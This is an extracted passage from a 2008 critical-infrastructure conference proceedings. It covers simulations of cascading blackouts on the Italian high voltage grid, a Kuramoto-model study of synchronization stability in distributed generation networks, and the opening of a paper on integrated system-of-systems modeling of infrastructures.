C. Dionisi et al.
Step 3: set n ← n + 1. If n > NE stop, otherwise generate the random numbers γkn , k = 1, 2, ..., N, independent uniformly distributed in [0, 1] and set PkL ← 2 × γkn × PkL , k = 1, 2, ..., N ; Step 4: set PS = 0; Step 5: consider the optimal DC power flow problem (3)-(8). If problem (3)-(8) is feasible, go to Step 6, otherwise go to Step 7; Step 6: solve problem (3)-(8), compute the corresponding blackout size measure PS /PD and the line occupations and go to Step 10; Step 7: if problem (3)-(8) is unfeasible due to the fact that the constraint (6) is violated for some (k, m) (and there are no other reasons of unfeasibility), that is the presence of overloaded lines is the only reason of unfeasibility, record the overloaded lines and go to Step 8 otherwise go to Step 9; Step 8: for each overloaded line (k, m) generate a random number p1 (k, m) uniformly distributed in [0, 1]. If p1 (k, m) is smaller than a reference value p0 ∈ [0, 1] outage the overloaded line (k, m) multiplying the line admittance by a small number. If at least one of the overloaded lines is outage, shed the loads that became isolated as a consequence of the outages of the lines, sum the power demanded by the loads shed to the value PS . Go back to Step 5. If there is no outage of overloaded lines go back to Step 6 after having relaxed the violated constraints (6) to make the problem feasible; Step 9: if problem (3)-(8) is unfeasible, check the total power PJL demanded by the load nodes k ∈ JL . If PJL /PD is greater than a threshold, that we choose equal to 0.3 in the simulation of Section 3, shed the smallest load belonging to JL otherwise shed the smallest load of the entire network; sum the power demanded by the load shed to the value PS and go back to Step 5; Step 10: record the blackout size measure PS /PD and the line occupations and go back to Step 2. The previous numerical scheme used to generate cascade can be interpreted as follows. Steps 1, 2, 3 define the load of the network, Step 4 is an initialization step, Step 5 verifies if the load assigned can be served satisfying the physical constraints of the network. If this is the case the computation stops. If this is not the case Steps 7, 8, 9 define the rules used to disconnect lines and loads in the attempt to restore feasibility. We begin disconnecting overloaded lines and when necessary we disconnect loads beginning from the smallest one in a suitable subset of nodes. The Steps 7, 8, 9 define the blackout cascade. Finally the Steps 6, 10 are technical steps needed to conclude the computation. Using the procedure described in Steps 1-10 to generate the blackout we can perform a statistical analysis of the blackout size measure generated by statistically known random fluctuations of the loads similar to the analysis presented in [4], [1], [2]. In fact, starting from a reference value of the load power vector P L (Step 2) we overload the network adding to the components of P L a random disturbance of known statistical properties (Step 3), this corresponds to changing the value of the total power demand PD randomly. In this way the resulting blackout size measure PS /PD computed through Steps 1-10 becomes a random variable so that after generating an appropriate statistical sample of PS /PD we
Blackouts in Power Transmission Networks
9
can compute an approximation of its probability density function. Note that for the networks studied in [1], [2] it has been shown that when the increment of PD is distributed proportionally on all the load nodes (JL = {1, 2, . . . , N }) and PD assumes plausible values, the probability of having large blackouts is small, and that blackouts of small size are much more likely than large blackouts. That is, the probability density function of the blackout size measure PS /PD decreases when PS /PD increases. When the increment of PD is concentrated in a group of load nodes localized in space (the black box in Figure 1) this may change depending on the magnitude of the total power demand increment and on the interdependence of the group of nodes considered. In fact, probability density functions with huge flat regions can be obtained (Figure 2). As suggested in [2] we use this statistical analysis to understand when the observed probability density function says that the transmission network is in ∗ critical condition. We identify critical condition with the condition PD > PD ∗ ∗ where the “critical value” PD is such that when PD /PC goes across PD /PC the probability density function of PS /PD changes from being best fitted by a negative exponential function to being best fitted by an inverse power law. Note that when random fluctuations of the loads are considered also the occupation of the line (k, m), Ok,m , is a random variable and that we study its mean value when k,m =1, 2, . . . , N , and Fk,m > 0 as a function of the total power demand PD . For k,m =1, 2, . . . , N , and Fk,m > 0 we limit our study to the mean value of the random variable Ok,m instead than studying its probability density function for practical reasons. In fact, in power transmission networks of real interest (Figure 1) there are (at least) several hundreds of lines and it will be unpractical to study the probability density functions of hundreds of random variables.
3
The Numerical Study of the Italian High Voltage Power Transmission Network
Let us use the models described in Section 2 to analyze the Italian high voltage power transmission network (Figure 1). The Italian high voltage power transmission network is represented as an undirected graph made of NG = 117 generator nodes (triangles), NL = 163 load nodes (circles), NJ = 30 junction nodes (diamonds), that is a network made of N = NG + NL + NJ = 310 nodes and having of 347 lines (see [2] for further details). Indeed the Italian high voltage network has 361 lines and among them 14 lines are double lines. We have removed these double lines as explained in Section 2. We consider the snapshot of the Italian high voltage power transmission network parameters considered in [2] and we use the normalizations of the voltage magnitude and power load vectors used in [2]. That is, since in the Italian high voltage transmission network the base power S0 is equal to 750 MW and the base voltage V0 is equal to 380 kV we must normalize the voltage magnitude vector |V | and the power load vector P L contained in the snapshot dividing them by 380 kV and by 750 MW, respectively.
10
C. Dionisi et al.
Starting from these data we perform a statistical analysis of the random variable PS /PD defined in Section 2 using samples made of 20000 individuals (NE = 20000 in the procedure described in Steps 1-10). We use samples of size 20000 since we have observed that in the numerical experiment presented here considering greater samples (i.e. made of NE > 20000 individuals) leaves substantially unchanged the estimated probability density functions. We consider increasing values of the mean power load of the load nodes contained in the black box shown in Figure 1. Remind that the load nodes are marked as circles in Figure 1. In particular, we increase the mean power load of these load nodes choosing in Step 2 α = 0, 0.1, 0.2, 0.4, 0.8. That is, we increase proportionally the power demand of each node in the box shown in Figure 1 (see Step 2 of the numerical scheme in Section 2) with respect to a “standard” (i.e. “expected”) demand contained in the vector P 0,L . The load power demand vector P 0,L contains the mean load power demand measured at the nodes of the Italian high voltage network. Moreover, as done in [2] we choose the probability of outage an overloaded line equal to 30%, that is in Step 8 we choose p0 = 0.3. As discussed in [1], the choice of p0 influences the properties of the blackouts generated by the scheme of Section 2. In fact when p0 = 0 there are no line outages. When p0 = 1 all overloaded lines outage and the cascading blackout generated are characterized by jumps in the load shed. Moreover the size of these jumps can be remarkable. The choice p0 = 0.3 is an intermediate choice. We approximate the probability density function of the random variable PS /PD dividing the interval [0, 1] in 20 non overlapping subintervals of equal size and for i = 1, 2, ..., 20 we compute the relative frequency fi in the sample of PS /PD generated with the Steps 2-10 associated to the subinterval i of the random variable PS /PD (see [2] for further details). We consider the resulting relative frequency fi associated to the center xi of the corresponding subinterval i, i = 1, 2, .., 20, and we construct the histogram approximating the probability density function using the couples (xi , fi ), i = 1, 2, ..., 20 (Figure 2).
(a)
(b)
Fig. 2. Histograms approximating the probability distribution function of PS /PD when PD /PC = 0.6941 (a), PD /PC = 0.8098 (b)
Blackouts in Power Transmission Networks
11
Table 1. Least squares errors made fitting the approximations of the probability density function of PS /PD with the exponential and with the inverse power law functions versus PD /PC α 0 0.1 0.2 0.4 0.8
PD /PC 0.6767 0.6941 0.7114 0.74599 0.8098
σe∗ 0.1220 0.3419 0.3786 0.4095 0.4495
σp∗ 1.4362 1.2287 0.7206 0.1165 0.0656
We note that Figure 2 shows some flat regions in the approximated probability density functions and that the approximated probability density functions are not monotonically decreasing functions of PS /PD . These two facts seem to be associated to spatially localized load anomalies. Let us use the couples (xi , fi ), i = 1, 2, . . . , 20 to analyze the behaviour of the (approximated) probability density function of the blackout size measure PS /PD when PS /PD increases. We fit the data (xi , fi ), i = 1, 2, ..., 20, using the negative exponential or using the inverse power law, that is using the formulae below: f1 (x) = Ae−mx , A > 0, m ≥ 0, f2 (x) = B/xa , B > 0, a ≥ 0, 0 ≤ x ≤ 1, (10) where A, m, B and a are real constants to be determined. The values of A, m, B and a are determined imposing that the corresponding functions (10) are the best fits of (xi , fi ), i = 1, 2, ..., 20, in the least squares sense. That is we choose the values A, m, B and a that minimize respectively the following quantities: 20 20 −mx 2 i σe = σe (A, m) = |fi − Ae | , σp = σp (B, a) = |fi − B/xai |2 , i=1
i=1
(11) subject to the constraints on A, m, B, a contained in (10). We denote with σe∗ , σp∗ the values assumed respectively by σe and σp in the minimizers. The results contained in Table 1 show that when PD is small “enough” the exponential law (10) fits the data (xi , fi ), i = 1, 2, . . . , 20 better than the power law (10)(σe∗ < σp∗ ). However, when PD is large “enough” the situation is reversed (σe∗ > σp∗ ). In particular, we are able to determine two values of PD that we (1)
(2)
(1)
denote PD = 0.7114PC and PD = 0.74599PC such that when PD < PD (2) we have σe∗ ≤ σp∗ and when PD > PD we have σe∗ ≥ σp∗ . We can say that in the hypotheses specified above when the power demand PD is greater than (2) (1) PD the transmission network is in “critical” condition and when PD < PD the transmission network is not in “critical” condition. Reasoning in analogy with what is done in statistical mechanics we can conclude that this analysis suggests that in the situation described above the Italian high voltage power ∗ transmission network has a phase transition in a point PD such that 0.7114 ≤
12
C. Dionisi et al.
(a)
(b)
Fig. 3. Expected value of the line occupations of an high voltage power transmission network when PD /PC = 0.7114, (a) and PD /PC = 0.8098, (b)
∗ PD /PC ≤ 0.74599. In [2] when the overload is distributed proportionally over all the load nodes of the network the corresponding interval is the following: ∗ 0.74 ≤ PD /PC ≤ 0.77. Finally, we study the effects produced by the increments in the mean total power demand PD on the occupation of the lines. Figure 3 shows a comparison between the mean values of the line occupations obtained when PD /PC = 0.7114 (α = 0.2) and when PD /PC = 0.8098(α = 0.8), that is for values of PD /PC below and above the phase transition phenomenon. We can see that, in general, the mean value of the line occupation is not homogeneous, that is the occupation of some lines is considerably greater than the occupation of the remaining lines of the network. This is due to two facts: the choice of the quadratic merit function that heavily induces to prefer the low cost generators and the effect due to the outage of the lines that determines the saturation of the line occupations when PD /PC is large enough. We note that the mean value of the line occupations when PD /PC = 0.7114 outside the black box is similar to the mean value of the line occupations of the original snapshot configuration (that has PD /PC = 0.6767) while when PD /PC = 0.8098 the mean value of the line occupations is different from that of the snapshot both inside and outside the black box. In particular, when PD /PC = 0.8098 the mean values of the line occupations of several lines is about 100%. However, Figure 3(a) shows that some lines have a mean occupation close to one also when PD /PC = 0.7114. This unbalance between the line occupations could be the origin of the possibility of large blackouts even when the mean value of the total power demand is substantially smaller than the total network capacity. The study of this vulnerability of the network should be further pursued. We note that the study of the relation between the network vulnerability and the network topology in the case of the Italian high voltage power transmission network has been started in [8]. In the website http://www.ceri.uniroma1.it/ceri/zirilli/w1 some auxiliary
Blackouts in Power Transmission Networks
13
material that helps the understanding of [2] and of this paper is available. In particular, the website contains two animations that show the cascading blackout phenomenon at a given value of PD and the line occupation tableau as a function of PD in the case of the Italian high voltage power transmission network when the optimal DC power flow problem (with linear merit function) is used to determine the power flow distribution and the overload is distributed proportionally over all the load nodes.
References 1. Carreras, B.A., Dobson, I., Lynch, V.E., Newman, D.E.: Critical points and transitions in an electric power transmission model for cascading failure blackout. Chaos 12, 985–994 (2002) 2. Farina, A., Graziano, A., Mariani, F., Zirilli, F.: Probabilistic analysis of failures in power transmission networks and “phase transitions”: a study case of an high voltage power transmission network. Journal of Optimization Theory and its Applications 139, 171–199 (2008) 3. Andersson, G., Donalek, P., Farmer, R., Hatziargyriou, N., Kamwa, I., Kundur, P., Martins, N., Paserba, J., Pourbeik, P., Sanchez-Gasca, J., Schulz, R., Stankovic, A., Taylor, C., Vittal, V.: Causes of the 2003 major grid blackouts in North America and Europe, and recommended means to improve system dynamic performance. IEEE Transactions on Power Systems 20, 1922–1928 (2005) 4. Carreras, B.A., Dobson, I., Newman, D.E.: A loading dependent model for probabilistic cascading failure. Probability in the Engineering and Informational Sciences 19, 15–32 (2005) 5. http://www.ee.washington.edu/research/pstca/ 6. Rider, M.J., Garcia, A.V., Romero, R.: Power system transmission network expansion planning using AC model. Generation, Transmission & Distribution, IET 1, 731–742 (2007) 7. http://www.afs.enea.it/project/enegrid/index.html 8. Bologna, S., Issacharoff, L., Rosato, V.: Influence of the topology on the power flux of the Italian high-voltage electrical network, http://www.giacs.org/files/wp3_files/V%20Rosato%20Europhys% 20Lett%20preprint.pdf
Stability of a Distributed Generation Network Using the Kuramoto Models Vincenzo Fioriti1 , Silvia Ruzzante2 , Elisa Castorini1 , Elena Marchei2 , and Vittorio Rosato1 1
2
ENEA, Casaccia Research Center, Via Anguillarese 301, 00123 S. Maria di Galeria (Rome) Italy {vincenzo.fioriti,elisa.castorini,rosato}@casaccia.enea.it ENEA, Portici Research Center, Via del Macello Vecchio, 00122 Portici, Italy {silvia.ruzzante,elena.marchei}@portici.enea.it
Abstract. We derive a Kuramoto-like equation from the Cardell-Ilic distributed electrical generation network and use the resulting model to simulate the phase stability and the synchronization of a small electrical grid. It is well-known that a major problem for distributed generation is the frequency stability. This is a non linear problem and proper models for analysis are sorely lacking. In our model nodes are arranged in a regular lattice; the strength of their couplings are randomly chosen and allowed to vary as square waves. Although the system undergoes several synchronization losses, nevertheless it is able to quickly resynchronize. Moreover, we show that the synchronization rising-time follows a power-law.
1
Introduction
One of the most important complex Critical Infrastructure (CI), the electric power system, is evolving from a ”concentrated generation” model towards a ”distributed generation” (DG) model, where a large number of small power generators are integrated into the transmission (and/or in the distribution) power supply system according to their availability. Large power plants (nuclear, coal, gas etc.) will be joined by low- (or intermediate-size) power generators, based on alternative sources (wind, solar, micro-hydro, biomass, geothermal, tidal, etc). Whereas the concentrated generation model can be (in principle) more simply controlled and managed, the DG model, with geographically unevenly distributed generation plants, producing electrical power as a function of the season, of the time of the day and the meteorological conditions, does indeed introduce, in an already complex scenario, further instability issues which are worth to be considered. More importantly, renewable source generators insert in the network different amounts of electrical power, amounts which can be, in turn, smaller (or even much smaller) than those provided by “conventional” means (fossil sources). Developing a successful grid supporting technologies for DG requires mathematical models of interconnections, control strategies able to cope with transient effects and to produce an efficient and robust distribution R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 14–23, 2009. c Springer-Verlag Berlin Heidelberg 2009
Stability of a Distributed Generation Network
15
system. Unfortunately, the connection of a large set of small- and intermediatesize generators to the generation and distribution network raises some problems as harmonic distortion of voltage [6], [11], [12], [13], stability of synchronization with the network, thermal limits, network faults. Moreover, in the future, other technological networks will tightly interact with the DG grid producing a tangled set of interdependencies whose final effects will undermine the stability of synchronization. Here we will focus on the development of a mathematical model, based on the Kuramoto model (KM) [2] equation, for the study of the stability of a DG grid. KM is the most successful attempt to study the ubiquitous phenomenon of synchronization, starting with Huyghens up to Van der Pol, Andronov, Wiener, Winfree, Kuramoto, Watanabe, Strogatz [3]. From simple mechanical devices to complex systems, a rich variety of dynamical systems have been modelled [8]: crowds of people, flocks of birds, school of fish, associative memories, array of lasers, charge density waves, nonlinear control systems, Josephson junctions, plasma, cardiac cells, power grids, epidemic spreading, social and economic behaviours. To derive a KM model for describing a distributed generators network, we have used the Cardell-Ilic linearized dynamic model for DG, that uses the power flow connecting the networks nodes as coupling parameter. On such a model system, we will attempt to study the effects of perturbations on the synchronization of a number of power generators (modelled as oscillators with given frequencies, different phase angles and connected with known couplings). Our model has been inspired by a previous work by Filatrella et al. [5] for a three large generators grid model. We have based our analysis on the same assumptions but further introducing coupling perturbations under the form of square waves with different amplitudes in order to simulate a large coupling spread among nodes and mimic a sudden collapse of the couplings.
2
The Kuramoto Model
In the following, for the sake of clarity, we will use the following convention: matrices will be denoted by upper case boldface characters while vectors will be denoted by lower case boldface characters. Moreover, if A is a matrix, we will use the notation aij to refer to its (i, j)th entry; likewise, if x is a vector, xi will denote its ith component. The standard Kuramoto model (SKM) [1], [2], [9] is a mean-field dynamic system resulting from a model of coupled oscillators whose phases are described to interact through a constant coupling as follows: N K θ˙i = ωi + sin(θj − θi ) N j=1
i = 1, . . . , N
(1)
where θi is the phase of the ith oscillator and depends on time t, ωi its natural frequency (natural frequencies are symmetrically distributed around ω0 ), K is strength of the constant coupling (same value for all links), N is the number of oscillators. The not-oriented oscillator network is supposed to be fully connected.
16
V. Fioriti et al.
In the case when lim (θi − θj ) = 0
t→∞
(2)
oscillators synchronize, and their phase differences become asymptotically constant. Oscillators run independently at their natural frequencies, while couplings tend to synchronize them all, acting like a feedback. In order to measure the phase coherence, a so-called order parameter R has been introduced [2] N 1 iθi R= e (3) N i=1
R ranges between 0 (no coherence) and 1 (perfect coherence). Kuramoto [2] showed that, for the model of (1), for K < kc (N −→ ∞) oscillators remain unsynchronized, while for K > kc they synchronize. If we modify SKM by introducing a generic adjacency matrix connecting nodes whose generic entry Kij (t) represents variable coupling strength between nodes and may vary as a function of time, we end up with a modified Kuramoto model equation which reads as follows: N ˙ θi = ω i + K m Kij sin(θj − θi ) i = 1, . . . , N (4) j=1
where Kij (t) values might be randomly selected and expressed as fractions of the maximum coupling value Km . The pertinence of the modified Kuramoto model to our purposes will be shown in the next section, where we derive the modified Kuramoto equation (4) starting from a Cardell-Ilic model of a distributetd network of power generators.
3
Derivation of the SKM from the Cardell-Ilic Model
The Cardell-Ilic model [6] is a linearized dynamic model for distributed generators (steam-turbine, combustion turbine, combined cycle, wind) in a power distribution system, using a very small number of state variables and incorporating the generated power as coupling variable among the individual models through the equation: ˜ + p˙ x˙ = Ax − Kω (5) where x is the state vector representing the physical variables of the generators ˜ according to the input-output decription. A is defined as the system matrix, K is derived from the jacobian matrix (of the linearized state equations), ω is the generator frequency and p˙ the power output. For the i-th row: x˙ i = aij xj − k˜ij ωj + p˙i i = 1, . . . , N (6) j
j
only for the the state variables regarding the phase.
Stability of a Distributed Generation Network
17
Setting θ˙i = xi , p˙ i = −
Ω0 max p Ii i
sin(θj − θi )
(7) i = 1, . . . , N
(8)
j
where Ii is the inertial moment, Ω0 the nominal system frequency and pmax is i the maximum power of the ith generator. We derive that [5]: j
aij θ˙j =
j
Ω0 max k˜ij ωj + p sin(θj − θi ) Ii i j
i = 1, . . . , N
(9)
in which we recognise the same formal equation of Kuramoto model where at the left hand side we find a linear combination of θ˙j , and at the right hand side a sum of a linear combination of frequencies and sinusoidal terms. Therefore, the simple, linearized Cardell-Ilic model is in relation with the SKM by means of the power couplings and expressing phases as linear combinations of the state variables of the complete distributed generation system (7). Many technical details have been neglected, but the general sense is that SKM can be used to map the dynamics of a distributed generation system.
4
The Simulation of the Modified SKM
Fig. 1 (right) reports a sketch of a model of a distributed network composed by the connection of smaller subnetworks. Each node represents a power generating unit; they are connected in a ring topology. The choice of this specific topology is motivated by a recent finding [7] that synchronization is preserved in the generic case of a graph formed by connected ring subgraphs, as in the left side of Fig. 1. While their [7] demonstration refers to a wider topology class, we study a simple ring topology for a single block; results could be then generalized to a more general structure. Simulations have been thus carried out by using the network in Fig. 1 (right). Scope of the simulations is to measure how a time-dependent coupling between nodes might affect the system’s synchronization. To this purpose, we have introduced time-dependent kij , under the form of square waves with amplitudes chosen from an uniform distribution between 0 and Km , and period from 55 min to 0.25 s, in order to simulate an abrupt change in the power. In fact, relevant problems for DG stability are the dropped generators and the small inertia of the generators. Both these problems induce a frequency destabilization. The physical constraint of the energy conservation has been taken into account by considering a dissipation node (the black node in Fig. 1). A stringent quality of service has been asked for defining the onset of synchronization among nodes, by requiring a value of R as large as R > 0.8. Under this assumption, the critical value for the onset of system’s synchronization results to be Km 0.1, which will be retained as the critical threshold of the Kuramoto model kc . Below this threshold, synchronization does not take place.
18
V. Fioriti et al.
Fig. 1. On the left side the block topology of the oscillators/generators, with the dissipating node. On the right side, a single block. This is the network used for the simulations whose results are the object of the present work.
5
Results
The network (right side of Fig. 1) has been simulated using t = 104 s with steps of dt = 0.05 s Figs. 2, 3, 4 show the behavior of the phase angle θi and the order parameter R in case of low Km = 0.1 (Figs. 2, 3) and high Km = 400 (Figs. 4, 5) coupling cases, respectively.
Fig. 2. Phases with low coupling (Km = 0.1)
Fig. 3. Order parameter R with low coupling (Km = 0.1)
Stability of a Distributed Generation Network
19
Fig. 4. Phases with high coupling (Km = 400)
Fig. 5. Order parameter R with high coupling (Km = 400)
Fig. 6. Enlargement of Fig. 5, t > 5000 s, high coupling
As a general feature of the model when the maximum coupling strength Km is low, R behaves erratically (Fig. 3), while when it increases, R rapidly goes to 1, although several crises can be observed. Phase differences θi remain almost constant (see Fig. 6). In particular: – low coupling strength: in Fig. 3 the order parameter oscillates erratically around a mean value (different from zero) because Km is close to the critical value kc . Unfortunately, this is not sufficient to guarantee a sufficiently stable synchronization as < R > 0.8.
20
V. Fioriti et al.
Fig. 7. Enlargement of Fig. 5, (between 3500 and 4000 s)
Fig. 8. Phases synchronization crisis (enlargement between 3500 and 4000 s) for Km = 400
Fig. 9. Further enlargements of the data shown in Fig.6
– high coupling strength: the order parameter is 1 for most of the time; some deep “crises” are observed, but the system quickly recovers stability. In Fig. 5 Km = 400: as a result, R oscillates around the unity. Figs. 6, 7 show successive enlargements of the phase angle behaviour during the crisis of synchronization loss at Km = 400. It is relevant to observe that, during the synchronization losses, the phase angles tends to remain synchronized, although the spread between the phase angle grows (see Figs. 8, 9).
Stability of a Distributed Generation Network
21
Fig. 10. The rising time, for Km = 4
Fig. 11. The power law: rising-time ts vs. max. coupling amplitude Km (log-log plot)
As a further finding, we have also studied the rising time (i.e. the time for R to pass from zero to the unity value, see Fig. 10) as a function of the value of Km , follows a power low pattern (Fig. 11). Moreno and Pacheco [8] found that the resynchronization time of a perturbed node decays as a power law of its degree, for the SKM in a scale free topology. Although we consider a simple ring topology, nevertheless the occurrence of two power laws may be clues of some kind of a self-organizing criticality (SOC) working in the KM. On the other hand, Carreras et al. [4] have suggested the SOC in power grids as an explanation to the blackouts. The meaning of Fig. 9 is that the restarting of a grid after a failure or during a control action, if an high value of the couplings is present, this will determine a fast re-synchronization, coping with the problem of the fault clearing time.
6
Conclusions
We discuss some stability issue of a DG power system modelled through a small (seven nodes) network; the dynamics of the generator’s phase angles have been described using a modified Kuramoto model [10] derived by a Cardell-Ilic model [6] by using the interaction scheme proposed by Filatrella [5]. Differently from that efforts, in our model, internode couplings are allowed to vary as square waves, with randomly chosen coupling amplitudes. Under these assumptions, we
22
V. Fioriti et al.
observe that the system, for average coupling values undergoes several synchronization losses from which has been able, however, to quickly recovering. We have also shown that the rising-time of synchronization follows a powerlaw, in qualitative agreement with previously reported findings [8], [4]. Our results are also in agreement with recent findings of Popovych et al. [3]. They showed that, for N ≥ 4 and Km sub-critical, the SKM shows phase chaos as N increases, developing rapidly high-dimensional chaos for N = 10 with the largest Lyapunov exponent (LLE) at its maximum positive value. Then the LLE decreases very fast as 1/N , indicating a less chaotic regime. They conclude that, for an intermediate size system (in term of number of oscillators), a more intense phase chaos than small (N < 4) or large (N > 20) ones can be generated; our simulation [10] seems to confirm their conclusions (see Figs. 2, 3).Thought their results have been obtained for the standard SKM (i.e. one fixed K) they seem to support the idea that an intermediate (5 < N < 20) value for N should be avoided, in order to have a robust phase-lock. In conclusion, the modified Kuramoto model seems able to describe a distributed generation and various model instabilities, both in power amplitude and frequency. Some useful indications can be derived: coupling strength must be kept as high as possible which means high voltage transmission/distribution lines, DG size (number of nodes) should be very small or very large, the grid must ensure the coupling feedback actions by means of an appropriate topology. Simulation of the modified SKM with larger and more complex network topologies are planned.
Acknowledgements The authors acknowledge fruitful discussion with R.Setola (Campus Biomedico). One of us (Silvia Ruzzante) acknowledges project CRESCO (PON 2000-2006, Misura II.2.a) for funding.
References 1. Chia, H., Ueda, Y.: Kuramoto Oscillators. Chaos Solitons & Fractals 12, 159 (2001) 2. Kuramoto, Y.: Chemical Oscillation. Springer, Berlin (1984) 3. Popovych, O., et al.: Phase Chaos in Coupled Oscillators. Phy. Rev. E 71, 06520 (2005) 4. Carreras, B., et al.: Evidence for SOC in a Time Series of Electric Power System Blackouts. Chaos 51, 1733 (2004) 5. Filatrella, G., et al.: Analysis of Power Grids using the Kuramoto Model. Eur. Phy. J. B 61, 485 (2008) 6. Cardell, J., Ilic, M.: Maintaining Stability with Distribute Generation. IEEE Power Eng. Soc. Meeting (2004) 7. Canale, E., Monzon, P.: Gluing Kuramoto Coupled Oscillators Networks. In: IEEE Decision and Control Conf., New Orleans (2007) 8. Moreno, Y., Pacheco, A.: Synchronization of Kuramoto Oscillators in Scale-Free Networks. Europhys. Lett. 68(4), 603 (2004)
Stability of a Distributed Generation Network
23
9. Acebron, J., et al.: The Kuramoto Model. Rew. Mod. Phy. 77, 137 (2005) 10. Fioriti, V., Rosato, V., Setola, R.: Chaos and Synchronization in Variable Coupling Kuramoto oscillators. Experimental Chaos Catania (2008) 11. http://www.iset.uni-kassel.de/publication/2007/ 2007 Power Tech Paper.pdf 12. Carsten, J., et al.: Riso Energy Report (2000) 13. Cardell, J., Ilic, M.: The Control of Distributed Generation. Kluwer Academic Press, Dordrecht (1998)
Enabling System of Systems Analysis of Critical Infrastructure Behaviors William J. Tolone1 , E. Wray Johnson2 , Seok-Won Lee1 , Wei-Ning Xiang1 , Lydia Marsh1 , Cody Yeager1 , and Josh Blackwell1 1
The University of North Carolina at Charlotte, 9201 University City Blvd, Charlotte, NC 28223-0001, USA 2 IntePoint, LLC, Charlotte, NC 28223-0001, USA
Abstract. Critical infrastructures are highly complex collections of people, processes, technologies, and information; they are also highly interdependent where disruptions to one infrastructure commonly cascade in scope and escalate in impact across other infrastructures. While it is unlikely that disruptions can be prevented with certainty, an effective practice of critical infrastructure analysis can reduce their frequency and/or lessen their impact. We contend that proper critical infrastructure analysis necessitates a system of systems approach. In this paper, we identify requirements for integrated modeling and simulation of critical infrastructures. We also present our integrated modeling and simulation framework based on a service-oriented architecture that enables system of systems analysis of such infrastructures.
1
Introduction
Critical infrastructures are those systems or assets (e.g., electric power and telecommunication systems, hospitals) that are essential to a nation’s security, economy, public health, and/or way of life [9]. The blackout in the northeast United States and southeast Canada in 2003, the hurricane damage in Louisiana and Texas in 2005, and numerous other smaller scale occurrences demonstrate the potentially catastrophic impacts of critical infrastructure disruptions. While it is unlikely that disruptions can be prevented with certainty, an effective practice of critical infrastructure analysis can reduce their frequency and/or lessen their impact by improving vulnerability assessments, protection planning, and strategies for response and recovery. In [17], it is argued that proper critical infrastructure analysis must account for the situated nature of infrastructures by incorporating into analysis the spatial, temporal, and functional context of each infrastructure. It is also argued that proper critical infrastructure analysis must account for the multi-dimensional nature of infrastructures by accounting for both the engineering and behavioral properties of each infrastructure. Engineering properties are the underlying physics-based properties that shape and constrain the operation of an infrastructure. Behavioral properties are the relational properties that emerge from R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 24–35, 2009. c Springer-Verlag Berlin Heidelberg 2009
Enabling System of Systems Analysis
25
business processes, decision points, human interventions, participating information, etc. of an infrastructure.1 These two characteristics contribute to making critical infrastructure analysis a “wicked problem” [15]. Wicked problems are non-linear problems that are without definitive formulations. Such problems have an open solution space where solutions have relative quality. Furthermore, each problem instance is arguably unique. We contend that the situated and multi-dimensional natures of critical infrastructures and the “wickedness” they introduce to analysis necessitate a system of systems approach to critical infrastructure analysis. System of systems analysis is appropriate for understanding large-scale, highly complex phenomena that are comprised of highly interdependent participating systems, which themselves may be large-scale and highly complex. Such a phenomenon is described as a system of systems when the behavior of the system is reflected in the emergent, synergistic behaviors of the participating systems. Critical infrastructure systems possess these characteristics as each infrastructure system is a highly complex collection of people, processes, technologies, and information. In addition, critical infrastructures are highly interdependent where disruptions in one infrastructure commonly cascade in scope and escalate in impact across other infrastructures [14]. As such, to analyze one of these infrastructures properly requires a system of systems analysis of all of these infrastructures. To meet this challenge, integrated modeling and simulation has emerged as a promising methodology to support system of systems analysis of critical infrastructures. However, integrated modeling and simulation necessitates both: 1) a proper representation of the situated, multi-dimensional nature of critical infrastructures; and 2) a proper integration framework and methodology for system of systems analysis. In [17], a representation of infrastructure context and behavior for integrated modeling and simulation is presented. In this paper, however, we examine the latter issue, the challenge of designing a proper integration framework for the modeling and simulation of critical infrastructures. The primary contributions of the work reported here are: 1) we identify emerging integrated modeling and simulation requirements for system of systems analysis of critical infrastructures; 2) we demonstrate the application of a service-oriented architecture to the challenge of integrated modeling and simulation of critical infrastructures; and, 3) we illustrate how this framework enables system of systems analysis of critical infrastructures. The structure of this paper is as follows. We begin by exploring related work in critical infrastructure modeling and simulation. Next, we examine emerging requirements for integrated modeling and simulation of critical infrastructures. We then present our framework for integrated modeling and simulation based on the popular service-oriented architecture. We conclude by providing an illustration that demonstrates system of systems analysis of critical infrastructures using our framework. Lastly, we provide a summary and discuss future work. 1
Casalicchio et. al. [2] provide an analogous description of the situated and multidimensional natures of critical infrastructures to that found in [17] in their discussion of the horizontal and vertical partitioning of federated models.
26
2
W.J. Tolone et al.
Related Work
Numerous approaches to critical infrastructure modeling and simulation have been explored. A comprehensive survey conducted in 2006 of current solutions highlights several of these approaches [11]. One approach to critical infrastructure modeling and simulation is to focus analysis to the exploration of single, isolated infrastructures, e.g., [1,4,13]. However, this non-integrated approach to modeling and simulation fails to recognize the situated nature of critical infrastructures. Furthermore, this approach does not offer a generalized way to fuse independent analyses. Another approach to critical infrastructure modeling and simulation is to focus on the interdependencies among infrastructures, e.g., [5,7]. Though not an integrated approach to modeling and simulation, this approach recognizes the situated nature of critical infrastructures. However, this approach does not adequately incorporate into the analysis the underlying multi-dimensional nature of each infrastructure. While dependencies among critical infrastructures can lead to cascading effects with escalating impacts [14], such effects and impacts often emerge from the interplay between these dependencies and the multi-dimensional behavior of each infrastructure. By focusing only on infrastructure interdependencies, the fidelity of the analysis is greatly reduced. Still another approach to critical infrastructure modeling and simulation is to build comprehensive models of critical infrastructures, e.g., [3,6,8,14,16]. However, this approach is not necessarily tractable due to the unique characteristics of each infrastructure. As a result, comprehensive models typically emphasize high level analysis. Finally, a more recent approach to critical infrastructure modeling and simulation focuses on the development of what Pederson et. al. [11] describe as a coupled modeling approach, e.g., [2,17,18]. Under this approach, individual infrastructure models are integrated in a generalized way with models of infrastructure dependencies to enable system of systems analysis - thus, coupling the fidelity of individual infrastructure models with the requirement for situated analysis. The promise of a coupled approach to critical infrastructure modeling and simulation highlights the challenge of designing a proper integration framework. Specifications for such frameworks have been developed. For example, the IEEE Standard 1516 High-Level Architecture (HLA) for modeling and simulation presents one such specification. The HLA specification is comprised of federates (which could model individual infrastructures), an object model (which defines a vocabulary for discourse among federates), and a run-time interface and infrastructure (which enable interaction among federates).
3
Modeling and Simulation Requirements for System of Systems Analysis of Critical Infrastructures
Enabling system of systems analysis of critical infrastructures presents many challenges. We describe a specific set of these challenges by identifying associated requirements for integrated modeling and simulation of critical infrastructures.
Enabling System of Systems Analysis
27
